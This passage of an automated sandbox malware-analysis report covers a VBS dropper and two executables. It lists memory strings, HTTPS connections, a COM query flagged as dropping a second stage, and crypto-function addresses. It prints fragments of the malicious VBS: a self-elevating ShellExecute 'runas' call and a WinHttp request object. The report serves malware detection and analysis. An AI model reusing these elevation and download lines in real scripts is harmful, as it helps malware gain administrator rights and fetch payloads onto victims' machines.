Source: bOamY.exe, 00000010.00000002.3385498400.000001E4F3B81000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3387683287.0000018B96575000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3388632287.0000018B968D2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: bOamY.exe, 00000010.00000002.3389737834.000001E4F62E0000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3389597117.0000018B96B10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#https-proxy-error-http-proxy
Source: registry_4131f52c.exe, 00000018.00000002.3389597117.0000018B96B10000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warnings
Source: bOamY.exe, 00000010.00000002.3389374617.000001E4F6220000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3389406471.0000018B96A50000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/1.26.x/advanced-usage.html#ssl-warningsPv
Source: bOamY.exe, 00000010.00000002.3389967185.000001E4F63C0000.00000004.00001000.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3389880560.0000018B96BF0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://urllib3.readthedocs.io/en/stable/v2-migration-guide.html
Source: bOamY.exe, 00000010.00000002.3388628047.000001E4F6093000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3387683287.0000018B964D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://w3c.github.io/html/sec-forms.html#multipart-form-data
Source: bOamY.exe, 0000000F.00000003.2348368148.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434305510.0000014CAE216000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.apache.org/licenses/
Source: bOamY.exe, 0000000F.00000003.2348506477.00000258FED93000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2348368148.00000258FED93000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2348368148.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434485555.0000014CAE221000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434305510.0000014CAE216000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000017.00000003.2434305510.0000014CAE221000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: bOamY.exe, 0000000F.00000003.2337381388.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2337381388.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308406430.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309851275.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2340880160.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310256300.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310118302.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2341251871.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2309580115.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2308590994.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2342101487.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310457041.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2345302264.00000258FED8F000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310766048.00000258FED90000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2344283479.00000258FED92000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310631078.00000258FED83000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 0000000F.00000003.2310923008.00000258FED83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: bOamY.exe, 0000000F.00000003.2340209765.00000258FED86000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3393525557.00007FFD83D1D000.00000002.00000001.01000000.00000017.sdmp, bOamY.exe, 00000010.00000002.3394917825.00007FFDA35F9000.00000002.00000001.01000000.00000016.sdmp, registry_4131f52c.exe, 00000017.00000003.2426490045.0000014CAE215000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3393622811.00007FFD8347D000.00000002.00000001.01000000.0000002C.sdmp, registry_4131f52c.exe, 00000018.00000002.3394883355.00007FFD93359000.00000002.00000001.01000000.0000002B.sdmp String found in binary or memory: https://www.openssl.org/H
Source: bOamY.exe, 00000010.00000003.2366518146.000001E4F5D0D000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000002.3387729278.000001E4F5C50000.00000004.00000020.00020000.00000000.sdmp, bOamY.exe, 00000010.00000003.2366243913.000001E4F5CF0000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3387683287.0000018B965B6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.python.org
Source: registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96FCD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wwww.certigna.fr/autorites/
Source: bOamY.exe, 00000010.00000002.3390468057.000001E4F6720000.00000004.00000020.00020000.00000000.sdmp, registry_4131f52c.exe, 00000018.00000002.3390335132.0000018B96FCD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://wwww.certigna.fr/autorites/0m
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown HTTPS traffic detected: 45.89.247.53:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.6:49724 version: TLS 1.2

System Summary
barindex
Potential malicious VBS script found (suspicious strings)
Source: Initial file: CreateObject("Shell.Application").ShellExecute "wscript.exe", """" & WScript.ScriptFullName & """ /elevated", "", "runas", 1
Source: Initial file: shellApp.ShellExecute videoURL, "", "", "open", 1
Source: Initial file: Set http = CreateObject("WinHttp.WinHttpRequest.5.1")
Source: Initial file: MsgBox "Erro: Falha ao criar o objeto WinHttp.WinHttpRequest."
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exe COM Object queried: Shell Automation Service HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{13709620-C279-11CE-A49E-444553540000} Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC34D50 15_2_00007FF7ADC34D50
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC16760 15_2_00007FF7ADC16760
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC35C9C 15_2_00007FF7ADC35C9C
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC20EE4 15_2_00007FF7ADC20EE4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC26EC8 15_2_00007FF7ADC26EC8
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC24E80 15_2_00007FF7ADC24E80
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC2D648 15_2_00007FF7ADC2D648
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC26644 15_2_00007FF7ADC26644
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC21DA0 15_2_00007FF7ADC21DA0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC210F0 15_2_00007FF7ADC210F0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC308E4 15_2_00007FF7ADC308E4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC330FC 15_2_00007FF7ADC330FC
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC208D0 15_2_00007FF7ADC208D0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC2CFC8 15_2_00007FF7ADC2CFC8
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC34FCC 15_2_00007FF7ADC34FCC
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC26644 15_2_00007FF7ADC26644
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC22730 15_2_00007FF7ADC22730
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC35750 15_2_00007FF7ADC35750
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC212F4 15_2_00007FF7ADC212F4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC38A98 15_2_00007FF7ADC38A98
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC28AD0 15_2_00007FF7ADC28AD0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC20AD4 15_2_00007FF7ADC20AD4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC2F938 15_2_00007FF7ADC2F938
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC20CE0 15_2_00007FF7ADC20CE0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC19CC0 15_2_00007FF7ADC19CC0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC32C60 15_2_00007FF7ADC32C60
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC26490 15_2_00007FF7ADC26490
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC2F938 15_2_00007FF7ADC2F938
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC11B90 15_2_00007FF7ADC11B90
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC22B34 15_2_00007FF7ADC22B34
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 15_2_00007FF7ADC2CB34 15_2_00007FF7ADC2CB34
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC34D50 16_2_00007FF7ADC34D50
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC35C9C 16_2_00007FF7ADC35C9C
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC20EE4 16_2_00007FF7ADC20EE4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC26EC8 16_2_00007FF7ADC26EC8
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC24E80 16_2_00007FF7ADC24E80
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC2D648 16_2_00007FF7ADC2D648
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC26644 16_2_00007FF7ADC26644
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC21DA0 16_2_00007FF7ADC21DA0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC210F0 16_2_00007FF7ADC210F0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC308E4 16_2_00007FF7ADC308E4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC330FC 16_2_00007FF7ADC330FC
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC208D0 16_2_00007FF7ADC208D0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC2CFC8 16_2_00007FF7ADC2CFC8
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC34FCC 16_2_00007FF7ADC34FCC
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC16760 16_2_00007FF7ADC16760
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC26644 16_2_00007FF7ADC26644
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC22730 16_2_00007FF7ADC22730
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC35750 16_2_00007FF7ADC35750
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC212F4 16_2_00007FF7ADC212F4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC38A98 16_2_00007FF7ADC38A98
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC28AD0 16_2_00007FF7ADC28AD0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC20AD4 16_2_00007FF7ADC20AD4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC2F938 16_2_00007FF7ADC2F938
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC20CE0 16_2_00007FF7ADC20CE0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC19CC0 16_2_00007FF7ADC19CC0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC32C60 16_2_00007FF7ADC32C60
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC26490 16_2_00007FF7ADC26490
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC2F938 16_2_00007FF7ADC2F938
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC11B90 16_2_00007FF7ADC11B90
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC22B34 16_2_00007FF7ADC22B34
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FF7ADC2CB34 16_2_00007FF7ADC2CB34
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E704A 16_2_00007FFD839E704A
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E734C 16_2_00007FFD839E734C
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E2EB4 16_2_00007FFD839E2EB4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E3972 16_2_00007FFD839E3972
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E2AC2 16_2_00007FFD839E2AC2
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E572C 16_2_00007FFD839E572C
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD83A90200 16_2_00007FFD83A90200
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E71C6 16_2_00007FFD839E71C6
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E66D6 16_2_00007FFD839E66D6
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD83B20140 16_2_00007FFD83B20140
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E2C57 16_2_00007FFD839E2C57
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E628F 16_2_00007FFD839E628F
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E4DF9 16_2_00007FFD839E4DF9
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E62EE 16_2_00007FFD839E62EE
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E17E4 16_2_00007FFD839E17E4
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E5D08 16_2_00007FFD839E5D08
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E3DD2 16_2_00007FFD839E3DD2
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E3139 16_2_00007FFD839E3139
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD83B805F0 16_2_00007FFD83B805F0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839FC620 16_2_00007FFD839FC620
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E12EE 16_2_00007FFD839E12EE
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E5024 16_2_00007FFD839E5024
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E111D 16_2_00007FFD839E111D
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839FC480 16_2_00007FFD839FC480
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E1041 16_2_00007FFD839E1041
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E609B 16_2_00007FFD839E609B
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E6532 16_2_00007FFD839E6532
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E320B 16_2_00007FFD839E320B
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E6E92 16_2_00007FFD839E6E92
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E298C 16_2_00007FFD839E298C
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD83B149D0 16_2_00007FFD83B149D0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E6429 16_2_00007FFD839E6429
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E2937 16_2_00007FFD839E2937
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E3099 16_2_00007FFD839E3099
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E3742 16_2_00007FFD839E3742
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E5894 16_2_00007FFD839E5894
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E6000 16_2_00007FFD839E6000
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E4016 16_2_00007FFD839E4016
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E1E7E 16_2_00007FFD839E1E7E
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E1AF0 16_2_00007FFD839E1AF0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD83B14CE0 16_2_00007FFD83B14CE0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E452F 16_2_00007FFD839E452F
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E1839 16_2_00007FFD839E1839
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E24AA 16_2_00007FFD839E24AA
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E49A8 16_2_00007FFD839E49A8
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD83B952F0 16_2_00007FFD83B952F0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD83B112B0 16_2_00007FFD83B112B0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839FD260 16_2_00007FFD839FD260
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E45CA 16_2_00007FFD839E45CA
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD83A05200 16_2_00007FFD83A05200
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E3E27 16_2_00007FFD839E3E27
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E1C26 16_2_00007FFD839E1C26
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E71D5 16_2_00007FFD839E71D5
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E2E0F 16_2_00007FFD839E2E0F
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E732E 16_2_00007FFD839E732E
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E2766 16_2_00007FFD839E2766
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E3C01 16_2_00007FFD839E3C01
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E2E37 16_2_00007FFD839E2E37
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E2F31 16_2_00007FFD839E2F31
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E3765 16_2_00007FFD839E3765
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E3EEA 16_2_00007FFD839E3EEA
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E5BD2 16_2_00007FFD839E5BD2
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E11CC 16_2_00007FFD839E11CC
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E227F 16_2_00007FFD839E227F
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E242D 16_2_00007FFD839E242D
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E4BAB 16_2_00007FFD839E4BAB
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E37F1 16_2_00007FFD839E37F1
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD83B95AA0 16_2_00007FFD83B95AA0
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E6BBD 16_2_00007FFD839E6BBD
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD83B19A80 16_2_00007FFD83B19A80
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E51E1 16_2_00007FFD839E51E1
Source: C:\Users\user\AppData\Local\Temp\n0EifhO_extraido\bOamY.exe Code function: 16_2_00007FFD839E35DF 16_2_00007FFD839E35DF
